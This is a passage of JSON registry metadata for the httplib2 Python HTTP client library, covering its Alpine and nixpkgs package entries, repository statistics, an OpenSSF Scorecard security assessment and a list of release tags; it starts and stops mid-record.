/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T03:48:32.357Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":9.21577315019938,"stargazers_count":4.519273371732388,"forks_count":3.2454585733274257,"average":4.245126273814798},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.7","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":232,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T10:19:27.891Z","updated_at":"2023-02-01T10:19:27.891Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.7","url":"https://pkgs.alpinelinux.org/packages?branch=v3.7","ecosystem":"alpine","default":false,"packages_count":9028,"maintainers_count":126,"namespaces_count":2,"keywords_count":661,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":310},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.832Z","updated_at":"2026-08-16T05:05:01.411Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.7/namespaces"}},{"id":13303633,"name":"python311Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T06:57:21.903Z","latest_release_published_at":"2026-02-02T06:57:21.903Z","latest_release_number":"0.21.0","last_synced_at":"2026-04-13T12:02:03.530Z","created_at":"2026-02-02T06:57:18.090Z","updated_at":"2026-08-22T07:23:52.227Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python311Packages.httplib2","install_command":"nix-env -iA nixpkgs.python311Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/httplib2/default.nix#L77","metadata":{"nix_attribute":"python3.11-httplib2-0.21.0","position":"pkgs/development/python-modules/httplib2/default.nix:77","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos